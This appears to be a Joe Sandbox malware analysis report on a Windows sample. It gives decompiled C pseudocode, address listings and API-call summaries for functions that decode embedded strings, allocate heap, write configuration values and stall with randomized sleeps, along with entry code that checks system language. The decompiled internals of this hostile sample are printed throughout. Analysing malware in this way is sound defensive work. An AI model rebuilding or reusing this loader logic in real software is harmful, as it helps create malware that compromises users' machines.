            • Instruction ID: 4e4340bdf3c7fb7eab87340dd15e58db0dad98b1d32837e209101070bf1f1502
            • Opcode Fuzzy Hash: e3637365f891dd1c0dc6119b7d6a22576ead414d96ae5b1a09a2173a040f0304
            • Instruction Fuzzy Hash: 98F0D0B1600142EBE7209FA7DD48BA67BA4DB4D348B44CB14B501DA351D674EC50DB25
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 59%
            			E047E2523(signed int __edx) {
            				signed int _v8;
            				long _v12;
            				CHAR* _v16;
            				long _v20;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t21;
            				CHAR* _t22;
            				CHAR* _t25;
            				intOrPtr _t26;
            				void* _t27;
            				void* _t31;
            				intOrPtr _t32;
            				void* _t33;
            				CHAR* _t37;
            				CHAR* _t43;
            				CHAR* _t44;
            				CHAR* _t45;
            				void* _t50;
            				void* _t52;
            				signed char _t57;
            				intOrPtr _t59;
            				signed int _t60;
            				void* _t64;
            				CHAR* _t68;
            				CHAR* _t69;
            				char* _t70;
            				void* _t71;
            
            				_t62 = __edx;
            				_v20 = 0;
            				_v8 = 0;
            				_v12 = 0;
            				_t21 = E047E4520();
            				if(_t21 != 0) {
            					_t60 =  *0x47ea2fc; // 0x2000000a
            					_t56 = (_t60 & 0xf0000000) + _t21;
            					 *0x47ea2fc = (_t60 & 0xf0000000) + _t21;
            				}
            				_t22 =  *0x47ea178(0, 2); // executed
            				_v16 = _t22;
            				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
            					_t25 = E047E3037( &_v8,  &_v20); // executed
            					_t55 = _t25;
            					_t26 =  *0x47ea348; // 0xc3d5a8
            					if( *0x47ea2fc > 5) {
            						_t8 = _t26 + 0x47eb51d; // 0x4d283a53
            						_t27 = _t8;
            					} else {
            						_t7 = _t26 + 0x47eb9db; // 0x44283a44
            						_t27 = _t7;
            					}
            					E047E4332(_t27, _t27);
            					_t31 = E047E415A(_t62,  &_v20,  &_v12); // executed
            					if(_t31 == 0) {
            						CloseHandle(_v20);
            					}
            					_t64 = 5;
            					if(_t55 != _t64) {
            						_t32 = E047E27A0();
            						 *0x47ea310 =  *0x47ea310 ^ 0x81bbe65d;
            						 *0x47ea36c = _t32;
            						_t33 = E047E33DC(0x60);
            						 *0x47ea3cc = _t33;
            						__eflags = _t33;
            						if(_t33 == 0) {
            							_push(8);
            							_pop(0);
            						} else {
            							memset(_t33, 0, 0x60);
            							_t50 =  *0x47ea3cc; // 0x5429600
            							_t71 = _t71 + 0xc;
            							__imp__(_t50 + 0x40);
            							_t52 =  *0x47ea3cc; // 0x5429600
            							 *_t52 = 0x47eb142;
            						}
            						_t55 = 0;
            						__eflags = 0;
            						if(0 == 0) {
            							_t37 = RtlAllocateHeap( *0x47ea2d8, 0, 0x43);
            							 *0x47ea368 = _t37;
            							__eflags = _t37;
            							if(_t37 == 0) {
            								_push(8);
            								_pop(0);
            							} else {
            								_t57 =  *0x47ea2fc; // 0x2000000a
            								_t62 = _t57 & 0x000000ff;
            								_t59 =  *0x47ea348; // 0xc3d5a8
            								_t13 = _t59 + 0x47eb74a; // 0x697a6f4d
            								_t56 = _t13;
            								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x47e927b);
            							}
            							_t55 = 0;
            							__eflags = 0;
            							if(0 == 0) {
            								asm("sbb eax, eax");
            								E047E3BD3( ~_v8 &  *0x47ea310, 0x47ea00c); // executed
            								_t43 = E047E1D8A(0, _t56, _t62, _t64, 0x47ea00c); // executed
            								_t55 = _t43;
            								__eflags = _t55;
            								if(_t55 != 0) {
            									goto L30;
            								}
            								_t44 = E047E6EA3(_t62); // executed
            								__eflags = _t44;
            								if(_t44 != 0) {
            									__eflags = _v8;
            									_t68 = _v12;
            									if(_v8 != 0) {
            										L29:
            										_t45 = E047E6815(_t62, _t68, _v8); // executed
            										_t55 = _t45;
            										goto L30;
            									}
            									__eflags = _t68;
            									if(__eflags == 0) {
            										goto L30;
            									}
            									_t55 = E047E5C31(__eflags,  &(_t68[4]));
            									__eflags = _t55;
            									if(_t55 == 0) {
            										goto L30;
            									}
            									goto L29;
            								}
            								_t55 = 8;
            							}
            						}
            					} else {
            						_t69 = _v12;
            						if(_t69 == 0) {
            							L30:
            							if(_v16 == 0 || _v16 == 1) {
            								 *0x47ea17c();
            							}
            							goto L34;
            						}
            						_t70 =  &(_t69[4]);
            						do {
            						} while (E047E23C4(_t64, _t70, 0, 1) == 0x4c7);
            					}
            					goto L30;
            				} else {
            					_t55 = _t22;
            					L34:
            					return _t55;
            				}
            			}
































            0x047e2523
            0x047e252d
            0x047e2530
            0x047e2533
            0x047e2536
            0x047e253d
            0x047e253f
            0x047e254b
            0x047e254d
            0x047e254d
            0x047e2556
            0x047e255c
            0x047e2561
            0x047e257b
            0x047e2587
            0x047e2589
            0x047e258e
            0x047e2598
            0x047e2598
            0x047e2590
            0x047e2590
            0x047e2590
            0x047e2590
            0x047e259f
            0x047e25ac
            0x047e25b3
            0x047e25b8
            0x047e25b8
            0x047e25c1
            0x047e25c4
            0x047e25ea
            0x047e25ef
            0x047e25fb
            0x047e2600
            0x047e2605
            0x047e260a
            0x047e260c
            0x047e2638
            0x047e263a
            0x047e260e
            0x047e2612
            0x047e2617
            0x047e261c
            0x047e2623
            0x047e2629
            0x047e262e
            0x047e2634
            0x047e263b
            0x047e263d
            0x047e263f
            0x047e264e
            0x047e2654
            0x047e2659
            0x047e265b
            0x047e268b
            0x047e268d
            0x047e265d
            0x047e265d
            0x047e2663
            0x047e2670
            0x047e2676
            0x047e2676
            0x047e267e
            0x047e2687
            0x047e268e
            0x047e2690
            0x047e2692
            0x047e2699
            0x047e26a6
            0x047e26ab
            0x047e26b0
            0x047e26b2
            0x047e26b4
            0x00000000
            0x00000000
            0x047e26b6
            0x047e26bb
            0x047e26bd
            0x047e26c4
            0x047e26c8
            0x047e26cb
            0x047e26e0
            0x047e26e4
            0x047e26e9
            0x00000000
            0x047e26e9
            0x047e26cd
            0x047e26cf
            0x00000000
            0x00000000
            0x047e26da
            0x047e26dc
            0x047e26de
            0x00000000
            0x00000000
            0x00000000
            0x047e26de
            0x047e26c1
            0x047e26c1
            0x047e2692
            0x047e25c6
            0x047e25c6
            0x047e25cb
            0x047e26eb
            0x047e26f0
            0x047e26f8
            0x047e26f8
            0x00000000
            0x047e26f0
            0x047e25d1
            0x047e25d4
            0x047e25de
            0x047e25e5
            0x00000000
            0x047e2700
            0x047e2700
            0x047e2703
            0x047e2707
            0x047e2707

            APIs
              • Part of subcall function 047E4520: GetModuleHandleA.KERNEL32(4C44544E,00000000,047E253B,00000001), ref: 047E452F
            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 047E25B8
              • Part of subcall function 047E27A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 047E27C4
              • Part of subcall function 047E27A0: wsprintfA.USER32 ref: 047E2828
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • memset.NTDLL ref: 047E2612
            • RtlInitializeCriticalSection.NTDLL(054295C0), ref: 047E2623
              • Part of subcall function 047E5C31: memset.NTDLL ref: 047E5C4B
              • Part of subcall function 047E5C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 047E5C91
              • Part of subcall function 047E5C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 047E5C9C
            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 047E264E
            • wsprintfA.USER32 ref: 047E267E
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
            • String ID:
            • API String ID: 1825273115-0
            • Opcode ID: 4ef908d78b0aa662c5e7501ae0ba8e74adaffa9e0d720d94cb66f9c9c516fa19
            • Instruction ID: 8da4638c5c6eae3ff9ef9462ad0d4796c68556b1d96742e7d15f1f484cd27c1b
            • Opcode Fuzzy Hash: 4ef908d78b0aa662c5e7501ae0ba8e74adaffa9e0d720d94cb66f9c9c516fa19
            • Instruction Fuzzy Hash: 5A51B771A01215EBDB11DBA7DD58BBE37ACEB0C704F148B96E502EB342E679B9408B50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 22%
            			E047E7040(signed int __eax, signed int _a4, signed int _a8) {
            				signed int _v8;
            				signed int _v12;
            				intOrPtr _v16;
            				signed int _v20;
            				intOrPtr _t81;
            				char _t83;
            				signed int _t90;
            				signed int _t97;
            				signed int _t99;
            				char _t101;
            				unsigned int _t102;
            				intOrPtr _t103;
            				char* _t107;
            				signed int _t110;
            				signed int _t113;
            				signed int _t118;
            				signed int _t122;
            				intOrPtr _t124;
            
            				_t102 = _a8;
            				_t118 = 0;
            				_v20 = __eax;
            				_t122 = (_t102 >> 2) + 1;
            				_v8 = 0;
            				_a8 = 0;
            				_t81 = E047E33DC(_t122 << 2);
            				_v16 = _t81;
            				if(_t81 == 0) {
            					_push(8);
            					_pop(0);
            					L37:
            					return 0;
            				}
            				_t107 = _a4;
            				_a4 = _t102;
            				_t113 = 0;
            				while(1) {
            					_t83 =  *_t107;
            					if(_t83 == 0) {
            						break;
            					}
            					if(_t83 == 0xd || _t83 == 0xa) {
            						if(_t118 != 0) {
            							if(_t118 > _v8) {
            								_v8 = _t118;
            							}
            							_a8 = _a8 + 1;
            							_t118 = 0;
            						}
            						 *_t107 = 0;
            						goto L16;
            					} else {
            						if(_t118 != 0) {
            							L10:
            							_t118 = _t118 + 1;
            							L16:
            							_t107 = _t107 + 1;
            							_t15 =  &_a4;
            							 *_t15 = _a4 - 1;
            							if( *_t15 != 0) {
            								continue;
            							}
            							break;
            						}
            						if(_t113 == _t122) {
            							L21:
            							if(_a8 <= 0x20) {
            								_push(0xb);
            								L34:
            								_pop(0);
            								L35:
            								E047E61DA(_v16);
            								goto L37;
            							}
            							_t24 = _v8 + 5; // 0xcdd8d2f8
            							_t103 = E047E33DC((_v8 + _t24) * _a8 + 4);
            							if(_t103 == 0) {
            								_push(8);
            								goto L34;
            							}
            							_t90 = _a8;
            							_a4 = _a4 & 0x00000000;
            							_v8 = _v8 & 0x00000000;
            							_t124 = _t103 + _t90 * 4;
            							if(_t90 <= 0) {
            								L31:
            								 *0x47ea318 = _t103;
            								goto L35;
            							}
            							do {
            								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
            								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
            								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
            								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
            								_v12 = _v12 & 0x00000000;
            								if(_a4 <= 0) {
            									goto L30;
            								} else {
            									goto L26;
            								}
            								while(1) {
            									L26:
            									_t99 = _v12;
            									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
            									if(_t99 == 0) {
            										break;
            									}
            									_v12 = _v12 + 1;
            									if(_v12 < _a4) {
            										continue;
            									}
            									goto L30;
            								}
            								_v8 = _v8 - 1;
            								L30:
            								_t97 = _a4;
            								_a4 = _a4 + 1;
            								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
            								__imp__(_t124);
            								_v8 = _v8 + 1;
            								_t124 = _t124 + _t97 + 1;
            							} while (_v8 < _a8);
            							goto L31;
            						}
            						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
            						_t101 = _t83;
            						if(_t83 - 0x61 <= 0x19) {
            							_t101 = _t101 - 0x20;
            						}
            						 *_t107 = _t101;
            						_t113 = _t113 + 1;
            						goto L10;
            					}
            				}
            				if(_t118 != 0) {
            					if(_t118 > _v8) {
            						_v8 = _t118;
            					}
            					_a8 = _a8 + 1;
            				}
            				goto L21;
            			}





















            0x047e7047
            0x047e704e
            0x047e7053
            0x047e7056
            0x047e705d
            0x047e7060
            0x047e7063
            0x047e7068
            0x047e706d
            0x047e71c1
            0x047e71c3
            0x047e71c5
            0x047e71ca
            0x047e71ca
            0x047e7073
            0x047e7076
            0x047e7079
            0x047e707b
            0x047e707b
            0x047e707f
            0x00000000
            0x00000000
            0x047e7083
            0x047e70af
            0x047e70b4
            0x047e70b6
            0x047e70b6
            0x047e70b9
            0x047e70bc
            0x047e70bc
            0x047e70be
            0x00000000
            0x047e7089
            0x047e708b
            0x047e70aa
            0x047e70aa
            0x047e70c1
            0x047e70c1
            0x047e70c2
            0x047e70c2
            0x047e70c5
            0x00000000
            0x00000000
            0x00000000
            0x047e70c5
            0x047e708f
            0x047e70d6
            0x047e70da
            0x047e71b4
            0x047e71b6
            0x047e71b6
            0x047e71b7
            0x047e71ba
            0x00000000
            0x047e71ba
            0x047e70e3
            0x047e70f4
            0x047e70f8
            0x047e71b0
            0x00000000
            0x047e71b0
            0x047e70fe
            0x047e7101
            0x047e7105
            0x047e7109
            0x047e710e
            0x047e71a6
            0x047e71a6
            0x00000000
            0x047e71ac
            0x047e7119
            0x047e7122
            0x047e7136
            0x047e713d
            0x047e7152
            0x047e7158
            0x047e7160
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x047e7162
            0x047e7162
            0x047e7162
            0x047e7169
            0x047e7171
            0x00000000
            0x00000000
            0x047e7173
            0x047e717c
            0x00000000
            0x00000000
            0x00000000
            0x047e717e
            0x047e7180
            0x047e7183
            0x047e7183
            0x047e7186
            0x047e718a
            0x047e718d
            0x047e7193
            0x047e7196
            0x047e719d
            0x00000000
            0x047e7119
            0x047e7094
            0x047e709c
            0x047e70a2
            0x047e70a4
            0x047e70a4
            0x047e70a7
            0x047e70a9
            0x00000000
            0x047e70a9
            0x047e7083
            0x047e70c9
            0x047e70ce
            0x047e70d0
            0x047e70d0
            0x047e70d3
            0x047e70d3
            0x00000000

            APIs
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • lstrcpy.KERNEL32(43175AC4,00000020), ref: 047E713D
            • lstrcat.KERNEL32(43175AC4,00000020), ref: 047E7152
            • lstrcmp.KERNEL32(00000000,43175AC4), ref: 047E7169
            • lstrlen.KERNEL32(43175AC4), ref: 047E718D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
            • String ID:
            • API String ID: 3214092121-3916222277
            • Opcode ID: 9d6f7317d6e7b1c2013a11e0f6c5231f6f0c4273bb81ad3ca4d6d81618d98d01
            • Instruction ID: e0717ba2bee134c914f9437c230776c3826013af792a1fafc5eafe718f15cc11
            • Opcode Fuzzy Hash: 9d6f7317d6e7b1c2013a11e0f6c5231f6f0c4273bb81ad3ca4d6d81618d98d01
            • Instruction Fuzzy Hash: C6519271A00218EBDF19CF9AC4846BDBBB6EF89354F14865AE9159F301C771AA41CB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			_entry_() {
            				void* _t1;
            				int _t4;
            				int _t6;
            
            				_t6 = 0;
            				_t1 = HeapCreate(0, 0x400000, 0); // executed
            				 *0x404160 = _t1;
            				if(_t1 != 0) {
            					 *0x404170 = GetModuleHandleA(0);
            					GetCommandLineW(); // executed
            					_t4 = E004019F1(); // executed
            					_t6 = _t4;
            					HeapDestroy( *0x404160);
            				}
            				ExitProcess(_t6);
            			}






            0x00401de2
            0x00401deb
            0x00401df1
            0x00401df8
            0x00401e01
            0x00401e06
            0x00401e0c
            0x00401e17
            0x00401e19
            0x00401e19
            0x00401e20

            APIs
            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401DEB
            • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
            • GetCommandLineW.KERNEL32 ref: 00401E06
              • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL ref: 00401A26
              • Part of subcall function 004019F1: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
              • Part of subcall function 004019F1: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
              • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
              • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
              • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
              • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
            • HeapDestroy.KERNEL32 ref: 00401E19
            • ExitProcess.KERNEL32 ref: 00401E20
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
            • String ID:
            • API String ID: 1863574965-0
            • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
            • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E5251(void* __edx) {
            				void* _v8;
            				int _v12;
            				WCHAR* _v16;
            				void* __edi;
            				void* __esi;
            				void* _t23;
            				intOrPtr _t24;
            				void* _t26;
            				intOrPtr _t32;
            				intOrPtr _t35;
            				void* _t37;
            				intOrPtr _t38;
            				intOrPtr _t42;
            				void* _t45;
            				void* _t50;
            				void* _t52;
            
            				_t50 = __edx;
            				_v12 = 0;
            				_t23 = E047E6ADC(0,  &_v8); // executed
            				if(_t23 != 0) {
            					_v8 = 0;
            				}
            				_t24 =  *0x47ea348; // 0xc3d5a8
            				_t4 = _t24 + 0x47ebc70; // 0x5429218
            				_t5 = _t24 + 0x47ebb60; // 0x4f0053
            				_t26 = E047E33F1( &_v16, _v8, _t5, _t4); // executed
            				_t45 = _t26;
            				if(_t45 == 0) {
            					StrToIntExW(_v16, 0,  &_v12);
            					_t45 = 8;
            					if(_v12 < _t45) {
            						_t45 = 1;
            						__eflags = 1;
            					} else {
            						_t32 =  *0x47ea348; // 0xc3d5a8
            						_t11 = _t32 + 0x47ebcc8; // 0x5429270
            						_t48 = _t11;
            						_t12 = _t32 + 0x47ebb60; // 0x4f0053
            						_t52 = E047E5DE4(_t11, _t12, _t11);
            						_t59 = _t52;
            						if(_t52 != 0) {
            							_t35 =  *0x47ea348; // 0xc3d5a8
            							_t13 = _t35 + 0x47ebcf0; // 0x30314549
            							_t37 = E047E5157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
            							if(_t37 == 0) {
            								_t61 =  *0x47ea2fc - 6;
            								if( *0x47ea2fc <= 6) {
            									_t42 =  *0x47ea348; // 0xc3d5a8
            									_t15 = _t42 + 0x47ebcd2; // 0x52384549
            									E047E5157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
            								}
            							}
            							_t38 =  *0x47ea348; // 0xc3d5a8
            							_t17 = _t38 + 0x47ebbb8; // 0x5429160
            							_t18 = _t38 + 0x47ebc1c; // 0x680043
            							_t45 = E047E5B0E(_v8, 0x80000001, _t52, _t18, _t17);
            							HeapFree( *0x47ea2d8, 0, _t52);
            						}
            					}
            					HeapFree( *0x47ea2d8, 0, _v16);
            				}
            				_t54 = _v8;
            				if(_v8 != 0) {
            					E047E7220(_t54);
            				}
            				return _t45;
            			}



















            0x047e5251
            0x047e5261
            0x047e5264
            0x047e526b
            0x047e526d
            0x047e526d
            0x047e5270
            0x047e5275
            0x047e527c
            0x047e5289
            0x047e528e
            0x047e5292
            0x047e52a0
            0x047e52ae
            0x047e52b2
            0x047e5343
            0x047e5343
            0x047e52b8
            0x047e52b8
            0x047e52bd
            0x047e52bd
            0x047e52c4
            0x047e52d0
            0x047e52d2
            0x047e52d4
            0x047e52d6
            0x047e52dd
            0x047e52e8
            0x047e52ef
            0x047e52f1
            0x047e52f8
            0x047e52fa
            0x047e5301
            0x047e530c
            0x047e530c
            0x047e52f8
            0x047e5311
            0x047e5316
            0x047e531d
            0x047e533b
            0x047e533d
            0x047e533d
            0x047e52d4
            0x047e534f
            0x047e534f
            0x047e5351
            0x047e5356
            0x047e5358
            0x047e5358
            0x047e5363

            APIs
            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05429218,00000000,?,746AF710,00000000,746AF730), ref: 047E52A0
            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05429160,?,00000000,30314549,00000014,004F0053,05429270), ref: 047E533D
            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,047E68B6), ref: 047E534F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID: Uet
            • API String ID: 3298025750-2766386878
            • Opcode ID: d9ddf9fc3ba58ee7f60fd0b778e31a542c26b4f1e3fc0347da9899796fe9a04d
            • Instruction ID: 0abd724fa61973c6f1eaa5f6bd5039c6d7fd1f4da2e17d3a1848baf1387bde48
            • Opcode Fuzzy Hash: d9ddf9fc3ba58ee7f60fd0b778e31a542c26b4f1e3fc0347da9899796fe9a04d
            • Instruction Fuzzy Hash: BC318C3290020DFFDB11DBD7DD88EEA3BBCEB4C708F444265A501AB221DA75AE48DB50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(80000002), ref: 047E43B5
            • SysAllocString.OLEAUT32(047E4D42), ref: 047E43F9
            • SysFreeString.OLEAUT32(00000000), ref: 047E440D
            • SysFreeString.OLEAUT32(00000000), ref: 047E441B
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 834127b9cd27aef42f022232012f7463f3153c082bb72b717154e3da6cc67047
            • Instruction ID: fd6fa0ca2264e12e1be2eac51ea98179a33784d3bbd1d02743bd6fec88de49e5
            • Opcode Fuzzy Hash: 834127b9cd27aef42f022232012f7463f3153c082bb72b717154e3da6cc67047
            • Instruction Fuzzy Hash: EE310EB6A00209AFCB05DF99D8849EE7BB5FF4D304B10852AF5069B250D734AA41CBA5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 65%
            			E047E213E(void* __ecx, intOrPtr _a4) {
            				struct _FILETIME _v12;
            				int _t13;
            				signed int _t16;
            				void* _t17;
            				signed int _t18;
            				unsigned int _t22;
            				void* _t30;
            				signed int _t34;
            
            				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
            				asm("stosd");
            				do {
            					_t13 = SwitchToThread();
            					GetSystemTimeAsFileTime( &_v12);
            					_t22 = _v12.dwHighDateTime;
            					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
            					_push(0);
            					_push(0x13);
            					_push(_t22 >> 5);
            					_push(_t16);
            					L047E8436();
            					_t34 = _t16 + _t13;
            					_t17 = E047E6269(_a4, _t34);
            					_t30 = _t17;
            					_t18 = 3;
            					Sleep(_t18 << (_t34 & 0x00000007)); // executed
            				} while (_t30 == 1);
            				return _t30;
            			}











            0x047e2143
            0x047e214e
            0x047e214f
            0x047e214f
            0x047e215b
            0x047e2164
            0x047e2167
            0x047e216b
            0x047e216d
            0x047e2172
            0x047e2173
            0x047e2174
            0x047e217e
            0x047e2181
            0x047e2188
            0x047e218c
            0x047e2193
            0x047e2199
            0x047e21a3

            APIs
            • SwitchToThread.KERNEL32(?,00000001,?,?,?,047E5044,?,?), ref: 047E214F
            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,047E5044,?,?), ref: 047E215B
            • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 047E2174
              • Part of subcall function 047E6269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 047E6308
            • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,047E5044,?,?), ref: 047E2193
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
            • String ID:
            • API String ID: 1610602887-0
            • Opcode ID: 68e6c456af700746fc3f44ea5066eeb64d1cca8ac4035abda2fa8782fe482edf
            • Instruction ID: 2f0e7e401855688c482a3f4bc8a8097983f425965d8e1cdd9413793603a85a19
            • Opcode Fuzzy Hash: 68e6c456af700746fc3f44ea5066eeb64d1cca8ac4035abda2fa8782fe482edf
            • Instruction Fuzzy Hash: 49F0A4B7B402047BD7149AA5CC1DBEF77BDDB88361F510624E601E7340E5B8AA018690
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E5157(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
            				struct _FILETIME _v12;
            				void* _t11;
            				short _t19;
            				void* _t21;
            				void* _t22;
            				void* _t24;
            				void* _t25;
            				short* _t26;
            
            				_t24 = __edx;
            				_t25 = E047E6536(_t11, _a12);
            				if(_t25 == 0) {
            					_t22 = 8;
            				} else {
            					_t26 = _t25 + _a16 * 2;
            					 *_t26 = 0;
            					_t22 = E047E330E(__ecx, _a4, _a8, _t25);
            					if(_t22 == 0) {
            						GetSystemTimeAsFileTime( &_v12);
            						_t19 = 0x5f;
            						 *_t26 = _t19;
            						_t21 = E047E7767(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8); // executed
            						_t22 = _t21;
            					}
            					HeapFree( *0x47ea2d8, 0, _t25);
            				}
            				return _t22;
            			}











            0x047e5157
            0x047e5168
            0x047e516c
            0x047e51c7
            0x047e516e
            0x047e5175
            0x047e517d
            0x047e5185
            0x047e5189
            0x047e518f
            0x047e5197
            0x047e519a
            0x047e51ad
            0x047e51b2
            0x047e51b2
            0x047e51bd
            0x047e51bd
            0x047e51ce

            APIs
